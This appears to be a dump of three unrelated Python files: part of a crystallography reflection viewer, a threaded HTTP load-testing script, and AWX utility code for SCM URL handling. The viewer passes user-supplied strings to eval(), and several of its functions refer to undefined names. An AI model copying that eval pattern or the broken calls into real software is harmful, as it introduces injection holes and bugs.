for i,arr in enumerate(self.viewer.proc_arrays):
arrtype = None
colnames = ["_refln.%s" %e for e in arr.info().labels ]
colname= None
if self.has_indices_with_multiple_data(arr):
# if array contains data with more than one data point for the same hkl index iotbx.cif
# cannot add additional arrays to the cif block so save this array in a separate file
singlecif = iotbx.cif.miller_arrays_as_cif_block(arr, array_type = arrtype,
column_name=colname, column_names = colnames )
fname = os.path.splitext(savefilename)[0] + "_%d"%i + os.path.splitext(savefilename)[1]
save2cif(fname, singlecif)
fnames.append(fname)
continue
if not mycif:
mycif = iotbx.cif.miller_arrays_as_cif_block(arr, array_type = arrtype,
column_name=colname, column_names = colnames )
else:
mycif.add_miller_array(arr, column_name= colname, array_type= arrtype,
column_names = colnames)
if mycif:
save2cif(savefilename, mycif)
fnames.append(savefilename)
self.mprint("Miller array(s) saved to: " + ",\n".join(fnames))
if len(fnames) > 1:
self.mprint("Unmerged data put into separate files")
else:
self.mprint("Can only save file in MTZ or CIF format. Sorry!")
def has_indices_with_multiple_data(self, arr):
return len(set(list(arr.indices()))) < arr.size()
def tabulate_arrays(self, datalabels):
if len(self.origarrays) == 0: # if not an mtz file then split columns
# SupersetMillerArrays may not be necessary if file formats except for cif and mtz can't store multiple data columns
#self.viewer.SupersetMillerArrays()
self.origarrays["HKLs"] = self.viewer.proc_arrays[0].indices()
for arr in self.viewer.proc_arrays:
if arr.is_complex_array():
ampls, phases = self.viewer.Complex2AmplitudesPhases(arr.data())
cmplxlst = [ "%.4f + %.4f * i"%(e.real, e.imag)
if not cmath.isnan(e) else display.nanval for e in arr.data() ]
self.origarrays[arr.info().label_string()] = cmplxlst
self.origarrays[arr.info().labels[0]] = list(ampls)
self.origarrays[arr.info().labels[-1]] = list(phases)
elif arr.is_hendrickson_lattman_array():
A,B,C,D = arr.data().as_abcd()
HLlst = [ "%.4f, %.4f, %.4f, %.4f"%(e[0], e[1], e[2], e[3]) for e in arr.data() ]
self.origarrays[arr.info().label_string()] = HLlst
self.origarrays[arr.info().labels[0]] = list(A)
self.origarrays[arr.info().labels[1]] = list(B)
self.origarrays[arr.info().labels[2]] = list(C)
self.origarrays[arr.info().labels[3]] = list(D)
elif arr.sigmas() is not None:
labels = arr.info().labels
# Labels could be something like ['I(+)', 'SIGI(+)', 'I(-)', 'SIGI(-)'].
# So group datalabels and sigmalabels separately assuming that sigma column contain the three letters "sig"
datalabel = ",".join([ e for e in labels if "sig" not in e.lower()])
sigmalabel = ",".join([ e for e in labels if "sig" in e.lower()])
self.origarrays[datalabel] = list(arr.data())
self.origarrays[sigmalabel] = list(arr.sigmas())
elif arr.is_integer_array():
list_with_nans = [ e if not e==display.inanval else display.nanval for e in arr.data() ]
if self.viewer.array_infotpls[id][0] == 'FreeR_flag': # want True or False back
list_with_nans = [ 1==e if not cmath.isnan(e) else display.nanval for e in list_with_nans ]
self.origarrays[arr.info().label_string()] = list_with_nans
else:
self.origarrays[arr.info().label_string()] = list(arr.data())
indices = self.origarrays["HKLs"]
dres = self.procarrays[0].unit_cell().d( indices)
dreslst = [("d_res", roundoff(list(dres)),3)]
hkls = list(indices)
hkllst = [ ("H", [e[0] for e in hkls] ), ("K", [e[1] for e in hkls] ), ("L", [e[2] for e in hkls] )]
datalst = []
labellists = eval(datalabels)
for labels in labellists:
crystlbl = ""; wavelbl = ""; scalelbl =""
for i,label in enumerate(labels):
if "crystal_id" in label:
crystlbl = "," + label
if "wavelength_id" in label:
wavelbl = "," + label
if "scale_group_code" in label:
scalelbl = "," + label
for label in labels:
if "crystal_id" in label or "wavelength_id" in label or "scale_group_code" in label:
continue
fulllabel = label + crystlbl + wavelbl + scalelbl
datalst.append( (label, list(self.origarrays[fulllabel])))
self.idx_data = hkllst + dreslst + datalst
self.mprint("Sending table data...", verbose=0)
mydict = { "tabulate_miller_array": self.idx_data }
self.params.tabulate_miller_array_ids = "[]" # to allow reopening a closed window again
self.SendInfoToGUI(mydict)
def TabulateMillerArray(self, ids):
self.params.tabulate_miller_array_ids = str(ids)
self.update_settings()
def SetCameraType(self, camtype):
self.params.NGL.camera_type = camtype
self.update_settings()
def ExpandToP1(self, val, inbrowser=True):
self.params.viewer.expand_to_p1 = val
self.params.viewer.inbrowser = inbrowser
self.update_settings()
def ExpandAnomalous(self, val, inbrowser=True):
self.params.viewer.expand_anomalous = val
self.params.viewer.inbrowser = inbrowser
self.update_settings()
def ShowOnlyMissing(self, val):
self.params.viewer.show_only_missing = val
self.update_settings()
def ShowMissing(self, val):
self.params.viewer.show_missing = val
self.update_settings()
def ShowDataOverSigma(self, val):
self.params.viewer.show_data_over_sigma = val
self.update_settings()
def ShowSystematicAbsences(self, val):
self.params.viewer.show_systematic_absences = val
self.update_settings()
def ShowSlice(self, val, axis="h", index=0):
axisstr = axis.lower()
self.params.viewer.slice_mode = val
self.params.viewer.slice_axis = axisstr
self.params.viewer.slice_index = index
self.update_settings()
def set_scene_bin_thresholds(self, strbinvals = "", binner_idx = 0, nbins = 6):
nuniquevalues = -1
if not strbinvals:
binvals, nuniquevalues = self.viewer.calc_bin_thresholds(binner_idx, nbins)
else:
nan = float("nan")
binvals = eval(strbinvals)
if binvals and binner_idx == 0:
binvals = list( 1.0/flex.double(binvals) )
self.viewer.UpdateBinValues(binner_idx, binvals, nuniquevalues)
def SetSceneNbins(self, nbins, binner_idx = 0):
self.params.nbins = nbins
self.params.binner_idx = binner_idx
self.params.NGL.bin_opacities = str([ (1.0, e) for e in range(nbins) ])
self.update_settings()
def GetNumberingOfBinners(self):
return [ (i,e) for i,e in enumerate(self.viewer.bin_labels_type_idxs) ]
def SetSceneBinThresholds(self, binvals=[]):
self.params.scene_bin_thresholds = str(binvals)
self.params.nbins = len(binvals)
self.update_settings()
def SetOpacities(self, bin_opacities):
self.params.NGL.bin_opacities = str(bin_opacities)
self.update_settings()
def SetToolTipOpacity(self, val):
self.params.NGL.tooltip_alpha = val
self.update_settings()
def SetShowToolTips(self, val):
self.params.NGL.show_tooltips = val
self.update_settings()
def set_scene(self, scene_id):
self.viewer.binvals = []
if scene_id is None:
return False
self.viewer.colour_scene_id = scene_id
self.viewer.radii_scene_id = scene_id
self.viewer.set_miller_array(scene_id)
if (self.viewer.miller_array is None):
raise Sorry("No data loaded!")
self.mprint( "Miller array %s runs from hkls: %s to %s" \
%(self.viewer.miller_array.info().label_string(), self.viewer.miller_array.index_span().min(),
self.viewer.miller_array.index_span().max() ) )
self.mprint("Spacegroup: %s" %self.viewer.miller_array.space_group().info().symbol_and_number())
self.update_space_group_choices()
return True
def SetScene(self, scene_id):
self.params.viewer.scene_id = scene_id
self.update_settings()
def SetMergeData(self, val):
self.params.merge_data = val
self.update_settings()
def SetColourScene(self, colourcol):
self.params.viewer.colour_scene_id = colourcol
self.update_settings()
def SetRadiusScene(self, radiuscol):
self.params.viewer.radii_scene_id = radiuscol
self.update_settings()
def SetRadiiScale(self, scale=1.0, nth_power_scale = -1.0):
"""
Scale radii. Decrease the contrast between large and small radii with nth_root_scale < 1.0
If nth_power_scale=0.0 then all radii will have the same size regardless of data values.
If nth_power_scale < 0.0 an automatic power will be computed ensuring the smallest radius
is 0.1 times the maximum radius
"""
self.params.viewer.scale = scale
self.params.viewer.nth_power_scale_radii = nth_power_scale
self.update_settings()
def SetColourRadiusToSigmas(self, val):
self.params.viewer.sigma_color_radius = val
self.update_settings()
def SetColourScheme(self, color_scheme, color_powscale=1.0):
self.params.viewer.color_scheme = color_scheme
self.params.viewer.color_powscale = color_powscale
self.update_settings()
def SetShapePrimitive(self, val):
self.params.shape_primitive = val
self.update_settings()
def set_shape_primitive(self, val):
if val == "points":
self.viewer.primitivetype = "PointBuffer"
else:
self.viewer.primitivetype = "sphereBuffer"
def SetAction(self, val):
self.params.action = val
self.update_settings()
def set_action(self, val):
if val == "reset_view":
self.viewer.SetAutoView()
if val == "is_terminating":
self.__exit__()
return False
return True
def SetFontSize(self, val):
self.params.NGL.fontsize = val
self.viewer.SetFontSize(val)
def list_vectors(self):
self.viewer.all_vectors = self.viewer.rotation_operators[:]
if self.tncsvec is not None:
uc = self.viewer.miller_array.unit_cell()
# TNCS vector is specified in realspace fractional coordinates. Convert it to cartesian
cartvec = list( self.tncsvec * matrix.sqr(uc.orthogonalization_matrix()) )
ln = len(self.viewer.all_vectors)
self.viewer.all_vectors.append( (ln, "TNCS", 0, cartvec, "", "", str(roundoff(self.tncsvec, 5)) ) )
self.viewer.all_vectors = self.viewer.all_vectors + self.uservectors
for (opnr, label, order, cartvec, hkl_op, hkl, abc) in self.viewer.all_vectors:
# avoid onMessage-DrawVector in HKLJavaScripts.js misinterpreting the commas in strings like "-x,z+y,-y"
name = label + hkl_op.replace(",", "_")
self.viewer.RemovePrimitives(name)
self.SendInfoToGUI( { "all_vectors": self.viewer.all_vectors } )
return self.viewer.all_vectors
def add_user_vector(self):
uc = self.viewer.miller_array.unit_cell()
ln = len(self.viewer.all_vectors)
label = self.params.viewer.user_label
order = 0
try:
hklvec = ""
abcvec = ""
hklop = ""
unwantedchars = " |(|)|[|]|{|}"
# individual characters separated by | substituted with a "" using re.sub()
if self.params.viewer.add_user_vector_hkl not in [None, "", "()"]:
hklvec = eval(re.sub(unwantedchars, "", self.params.viewer.add_user_vector_hkl))
# convert into cartesian space
cartvec = list( self.viewer.scene.renderscale*(hklvec * matrix.sqr(uc.fractionalization_matrix()).transpose()) )
elif self.params.viewer.add_user_vector_abc not in [None, "", "()"]:
abcvec = eval(re.sub(unwantedchars, "", self.params.viewer.add_user_vector_abc))
# convert into cartesian space
cartvec = list(abcvec * matrix.sqr(uc.orthogonalization_matrix()))
elif self.params.viewer.add_user_vector_hkl_op not in [None, ""]:
hklop = re.sub(unwantedchars, "", self.params.viewer.add_user_vector_hkl_op)
rt = sgtbx.rt_mx(symbol=hklop, r_den=12, t_den=144)
self.viewer.symops.append( rt ) #
(cartvec, a, label, order) = self.viewer.GetVectorAndAngleFromRotationMx( rt.r() )
if label:
label = "%s-fold_%s" %(str(int(roundoff(2*math.pi/a, 0))), self.params.viewer.user_label)
self.mprint("Rotation axis, %s, added" %label)
if label =="" or order==0:
self.mprint("Cannot compute a rotation axis from %s" %self.params.viewer.add_user_vector_hkl_op)
return
if (self.params.viewer.add_user_vector_hkl in [None, "", "()"] \
and self.params.viewer.add_user_vector_abc in [None, "", "()"] \
and self.params.viewer.add_user_vector_hkl_op) in [None, ""]:
self.mprint("No vector was specified")
self.uservectors.append( (ln, label, order, cartvec, hklop, str(hklvec), str(abcvec) ))
self.list_vectors()
except Exception as e:
raise Sorry( str(e))
self.params.viewer.add_user_vector_hkl_op = ""
self.params.viewer.add_user_vector_hkl = ""
self.params.viewer.add_user_vector_abc = ""
def AddUserVector(self, hkl_op="", abc="", hkl="", label=""):
"""
Vector can be specified as a rotation operator, say "-h-k,k,-l" subject to spacegroup contraints,
as a fractional vector in real space or as a fractional vector in reciprocal space. If
specified as a rotation operator the derived vector is the implicit rotation axis.
"""
self.params.viewer.user_label = label
self.params.viewer.add_user_vector_hkl_op = str(hkl_op)
self.params.viewer.add_user_vector_abc = str(abc)
self.params.viewer.add_user_vector_hkl = str(hkl)
self.update_settings()
def ShowRotationAxes(self, val):
self.params.viewer.show_symmetry_rotation_axes = val
self.update_settings()
def ShowVector(self, i, val=True):
self.params.viewer.show_vector = str([i, val])
self.update_settings()
def ShowUnitCell(self, val):
self.params.show_real_space_unit_cell = val
self.update_settings()
def ShowReciprocalUnitCell(self, val):
self.params.show_reciprocal_unit_cell = val
self.update_settings()
def SetClipPlane(self, use=True, hkldist=0.0, clipwidth=2.0):
if use:
self.params.clip_plane.hkldist = hkldist
self.params.clip_plane.clipwidth = clipwidth
self.params.slice_mode = False
self.params.inbrowser = True
else:
self.params.clip_plane.clipwidth = None
self.update_settings()
def SinglePlaneOfReflections(self, use=True, axis="h", slice_index=0 ):
if use:
viewer.slice_axis = axis
viewer.is_parallel = False
viewer.slice_mode = True
viewer.inbrowser = False
viewer.fixorientation = "reflection_slice"
viewer.slice_index = slice_index
else:
viewer.slice_mode = False
viewer.inbrowser = True
viewer.fixorientation = "None"
self.update_settings()
def OrientVector(self, vecnr, is_parallel, val=True):
viewer.fixorientation = "None"
if val:
viewer.is_parallel = is_parallel
viewer.fixorientation = "vector"
viewer.show_vector = '[%d, True]' %vecnr
self.update_settings()
def AnimateRotateAroundVector(self, vecnr, speed):
self.params.clip_plane.animate_rotation_around_vector = str([vecnr, speed])
self.update_settings()
def RotateAroundVector(self, vecnr, dgr):
self.params.clip_plane.angle_around_vector = str([vecnr, dgr])
self.update_settings()
def ShowHKL(self, hkl):
self.params.viewer.show_hkl = str(hkl)
self.update_settings()
def SetMouseSpeed(self, trackspeed):
self.params.NGL.mouse_sensitivity = trackspeed
self.update_settings()
def GetMouseSpeed(self):
self.viewer.GetMouseSpeed()
return self.params.NGL.mouse_sensitivity
def GetSpaceGroupChoices(self):
"""
return array of strings with available subgroups of the space group
"""
if (self.viewer.miller_array is None) :
self.mprint( NOREFLDATA)
if self.spacegroup_choices:
return [e.symbol_and_number() for e in self.spacegroup_choices]
return []
def SaveImageName(self, fname):
self.viewer.MakeImage(fname)
def SendCurrentPhilValues(self):
philstrvalsdict = {}
for e in self.currentphil.all_definitions():
philstrvalsdict[e.path] = e.object.extract()
mydict = { "current_phil_strings": philstrvalsdict }
self.SendInfoToGUI(mydict)
if self.viewer.params.viewer.scene_id is not None:
self.SendInfoToGUI({ "used_nth_power_scale_radii": self.viewer.HKLscene_from_dict().nth_power_scale_radii })
def GetHtmlURL(self):
return self.viewer.url
def GetHtmlstring(self):
return self.viewer.htmlstr
def GetArrayInfotpls(self):
"""
return array of tuples with information on each miller array
"""
return self.viewer.array_infotpls
def GetSceneDataLabels(self):
return [ e[3][0] for e in myHKLview.viewer.hkl_scenes_infos ]
def GetHklScenesInfos(self):
"""
return array of strings with information on each processed miller array
which may have been expanded with anomalous reflections or truncated to non-anomalous reflections
as to match the currently selected miller array
"""
return self.viewer.hkl_scenes_infos
def GetBinInfo(self):
"""
return array of number of hkls and bin boundaries of the bins the current miller array data has been sorted into.
Useful when deciding which bin of reflections to make transparent
"""
return self.viewer.binstrs
def SendInfoToGUI(self, infodict, binary=True):
if self.guiSocketPort:
m = str(infodict).encode("utf-8")
if not binary:
self.guisocket.send( m )
else:
if type(m) is not bytes:
m = bytes(m)
bindict = zlib.compress( m )
self.guisocket.send( bindict )
masterphilstr = """
openfilename = None
.type = path
use_provided_miller_arrays = False
.type = bool
savefilename = None
.type = path
save_image_name = None
.type = path
merge_data = False
.type = bool
miller_array_operations = ''
.type = str
spacegroup_choice = 0
.type = int
using_space_subgroup = False
.type = bool
mouse_moved = False
.type = bool
real_space_unit_cell_scale_fraction = None
.type = float
reciprocal_unit_cell_scale_fraction = None
.type = float
clip_plane {
angle_around_vector = \"[0,0]\"
.type = str
animate_rotation_around_vector = \"[0,0]\"
.type = str
hkldist = 0.0
.type = float
clipwidth = None
.type = float
fractional_vector = reciprocal *realspace
.type = choice
bequiet = False
.type = bool
}
scene_bin_thresholds = ''
.type = str
binner_idx = 0
.type = int
nbins = 1
.type = int(value_min=1, value_max=40)
shape_primitive = *'spheres' 'points'
.type = choice
viewer {
scene_id = None
.type = int
ncolourlabels = 6
.type = int
show_symmetry_rotation_axes = False
.type = bool
show_vector = ''
.type = str
add_user_vector_hkl_op = ""
.type = str
add_user_vector_abc = ""
.type = str
add_user_vector_hkl = ""
.type = str
user_label = ""
.type = str
show_hkl = ""
.type = str
is_parallel = False
.type = bool
fixorientation = vector reflection_slice *None
.type = choice
angle_around_XHKL_vector = 0.0
.type = float
angle_around_YHKL_vector = 0.0
.type = float
angle_around_ZHKL_vector = 0.0
.type = float
%s
}
NGL {
%s
}
action = *is_running is_terminating reset_view
.type = choice
tabulate_miller_array_ids = "[]"
.type = str
""" %(display.philstr, view_3d.ngl_philstr)
def run():
"""
utility function for passing keyword arguments more directly to HKLViewFrame()
"""
#time.sleep(15)
# dirty hack for parsing a file path with spaces of a browser if not using default
args = sys.argv[1:]
sargs = " ".join(args)
qchar = "'"
if sargs.find("'") > -1:
quote1 = sargs.find(qchar)
if sargs[ quote1 + 1:].find(qchar) < 0:
raise Sorry("Missing quote in arguments")
quote2 = sargs[ quote1 + 1:].find(qchar) + quote1 + 1
space1 = sargs[ :quote1].rfind(" ")
arg = sargs[space1 +1: quote2 +1]
sargs2 = sargs.replace(arg,"")
args = sargs2.split(" ")
arg = arg.replace("'","")
arg = arg.replace('"',"")
arg = arg.replace('\\', '/') # webbrowser module wants browser paths having unix forward slashes
args.append(arg)
kwargs = dict(arg.split('=') for arg in args if '=' in arg)
#check if any argument is a filename
for arg in args:
# if so add it as a keyword argument
if os.path.isfile(arg) and '=' not in arg:
kwargs['hklin'] = arg
myHKLview = HKLViewFrame(**kwargs)
return myHKLview
if __name__ == '__main__':
run()
|
load.py
|
import requests
import difflib
import numpy as np
import logging
import collections
import sys
import os
import statistics
import uuid
import matplotlib.pyplot as plt
import time
from util import get_request, get_data_size
from threading import Thread
import time
workerData = collections.namedtuple('workerData',['totalTime', 'numReqs', 'numErrors'])
compounded = collections.namedtuple('compounded',['numWorkers', 'totalReqs', 'avgWorkerTime', 'totalErrors'])
class Load(object):
def __init__(self, baseClients, baseRequests, iterations, proxyDict, urls):
self.baseClients = baseClients
self.baseRequests = baseRequests
self.iterations = iterations
self.proxyDict = proxyDict
self.urls = urls
self.workers = []
self.clientPoints = []
self.reqPoints = []
self.waitTime = 3
def run(self):
for url in self.urls:
kbs = int(get_data_size(url) / 1000)
logging.info('Iterating on num clients, fixed reqs per client'.upper())
fig = plt.figure()
dps = self.run_iterations(url, True)
title = 'GET: {}\nData Size: {} kbs; Fixed at {} Requests Per Client'.format(url, kbs, self.baseRequests)
self.generate_plot(title, dps, iterClients=True)
fig.savefig('{}.png'.format(uuid.uuid4()), dpi=300)
logging.info('Iterating on reqs/client'.upper())
fig = plt.figure()
dps = self.run_iterations(url, False)
title = 'GET: {}\nData Size: {} kbs; Fixed at {} Clients'.format(url, kbs, self.baseClients)
self.generate_plot(title, dps, iterReqs=True)
fig.savefig('{}.png'.format(uuid.uuid4()), dpi=300)
logging.info('Iterating on Fixed Requests'.upper())
fixedReqs = self.baseRequests * self.baseClients * self.iterations
fig = plt.figure()
dps = self.run_iterations(url, True, fixedReqs)
title = 'GET: {}\nData Size: {} kbs; Fixed at ~{} Requests'.format(url, kbs, fixedReqs)
self.generate_plot(title, dps, fixedReqs=True)
fig.savefig('{}.png'.format(uuid.uuid4()), dpi=300)
def run_iterations(self, url, iterateClients, fixedRequests=None):
data_points = []
numClients = self.baseClients
reqsPerClient = self.baseRequests if fixedRequests is None else fixedRequests / numClients
for i in range(self.iterations):
self.run_concurrent(numClients, reqsPerClient, url)
time.sleep(self.waitTime) # To avoid 429s
# All workers done
data_points.append(self.get_data_point(numClients, reqsPerClient))
if iterateClients:
numClients += self.baseClients
if fixedRequests is not None:
reqsPerClient = fixedRequests / numClients
else:
reqsPerClient += self.baseRequests
return data_points
def generate_plot(self, title, data_points, iterClients=False, iterReqs=False, fixedReqs=False):
rpsCalc = lambda reqs, workers, avgTime: round(reqs / float(workers * avgTime), 2)
ys = [rpsCalc(p.totalReqs, p.numWorkers, p.avgWorkerTime) for p in data_points]
plt.ylabel('Requests / Second', fontsize=10)
if iterClients:
xs = [p.totalReqs for p in data_points]
plt.xlabel('Total Requests', fontsize=10)
bs = [p.numWorkers for p in data_points]
cs = [round(p.avgWorkerTime, 2) for p in data_points]
plt.plot(xs, ys, 'ro', label='# Clients, Client Perceived Time (s)')
elif iterReqs:
xs = [p.totalReqs for p in data_points]
plt.xlabel('Total Requests', fontsize=10)
bs = [p.totalReqs / p.numWorkers for p in data_points]
cs = [round(p.avgWorkerTime, 2) for p in data_points]
plt.plot(xs, ys, 'ro', label='Requests per Client, Client Perceived Time (s)')
elif fixedReqs:
xs = [p.numWorkers for p in data_points]
plt.xlabel('Number of Clients', fontsize=10)
bs = [p.totalReqs / p.numWorkers for p in data_points]
cs = [round(p.avgWorkerTime, 2) for p in data_points]
plt.plot(xs, ys, 'ro', label='Requests per Client, Client Perceived Time (s)')
plt.title(title, fontsize=10)
plt.legend(loc='upper right', fontsize=7)
for i in range(len(xs)):
plt.annotate(' {}, {}'.format(bs[i], cs[i]), (xs[i], ys[i]), fontsize=5)
#compunded = collections.namedtuple('compounded',['numWorkers', 'totalReqs', 'avgWorkerTime', 'totalErrors'])
def get_data_point(self, numClients, numReqs):
avgWorkerTime = statistics.mean([x.totalTime for x in self.workers])
totalErrors = int(sum([x.numErrors for x in self.workers]))
totalReqs = numReqs * numClients
self.workers = []
return compounded(numClients, totalReqs, avgWorkerTime, totalErrors)
def run_concurrent(self, clients, reqPerClient, url):
logging.info('Starting {} Clients, each with {} Requests to {}'.format(clients, reqPerClient, url))
threads = []
for i in range(clients):
t = Thread(target=self.worker, args=(reqPerClient, url))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def worker(self, nReqs, url):
errors = 0
start = time.time()
for i in range(nReqs):
try:
res = get_request(url, self.proxyDict)
except Exception as e:
errors += 1
elapsed = time.time() - start
self.workers.append(workerData(elapsed, nReqs, errors))
|
common.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from datetime import timedelta
import json
import yaml
import logging
import os
import subprocess
import re
import stat
import urllib.parse
import threading
import contextlib
import tempfile
from functools import reduce, wraps
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.dateparse import parse_datetime
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db import connection
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor, ManyToManyDescriptor
from django.db.models.query import QuerySet
from django.db.models import Q
from django.db import connection as django_connection
from django.core.cache import cache as django_cache
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.utils.timezone import now
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400',
'camelcase_to_underscore',
'underscore_to_camelcase',
'memoize',
'memoize_delete',
'get_awx_http_client_headers',
'get_awx_version',
'update_scm_url',
'get_type_for_model',
'get_model_for_type',
'copy_model_by_class',
'copy_m2m_relationships',
'prefetch_page_capabilities',
'to_python_boolean',
'datetime_hook',
'ignore_inventory_computed_fields',
'ignore_inventory_group_removal',
'_inventory_updates',
'get_pk_from_dict',
'getattrd',
'getattr_dne',
'NoDefaultProvided',
'get_current_apps',
'set_current_apps',
'extract_ansible_vars',
'get_search_fields',
'model_to_dict',
'NullablePromptPseudoField',
'model_instance_diff',
'parse_yaml_or_json',
'RequireDebugTrueOrTest',
'has_model_field_prefetched',
'set_environ',
'IllegalArgumentError',
'get_custom_venv_choices',
'get_external_account',
'task_manager_bulk_reschedule',
'schedule_task_manager',
'classproperty',
'create_temporary_fifo',
'truncate_stdout',
'deepmerge',
'get_event_partition_epoch',
'cleanup_new_process',
]
def get_object_or_400(klass, *args, **kwargs):
"""
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will return in a 400 response.
"""
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def datetime_hook(d):
new_d = {}
for key, value in d.items():
try:
new_d[key] = parse_datetime(value)
except TypeError:
new_d[key] = value
return new_d
def camelcase_to_underscore(s):
"""
Convert CamelCase names to lowercase_with_underscore.
"""
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
"""
Convert lowercase_with_underscore names to CamelCase.
"""
return ''.join(x.capitalize() or '_' for x in s.split('_'))
class RequireDebugTrueOrTest(logging.Filter):
"""
Logging filter to output when in DEBUG mode or running tests.
"""
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
"""
Decorator to wrap a function and cache its result.
"""
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
@memoize(ttl=3600 * 24) # in practice, we only need this to load once at process startup time
def get_event_partition_epoch():
from django.db.migrations.recorder import MigrationRecorder
return MigrationRecorder.Migration.objects.filter(app='main', name='0144_event_partitions').first().applied
def get_awx_version():
"""
Return AWX version as reported by setuptools.
"""
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
def get_awx_http_client_headers():
license = get_license().get('license_type', 'UNLICENSED')
headers = {
'Content-Type': 'application/json',
'User-Agent': '{} {} ({})'.format('AWX' if license == 'open' else 'Red Hat Ansible Automation Platform', get_awx_version(), license),
}
return headers
def update_scm_url(scm_type, url, username=True, password=True, check_special_cases=True, scp_format=False):
"""
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
"""
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'svn', 'insights', 'archive'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
# if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
# if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git.
elif scm_type == 'git':
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https'),
'archive': ('http', 'https'),
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
# raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
netloc = u':'.join([urllib.parse.quote(x, safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path, parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
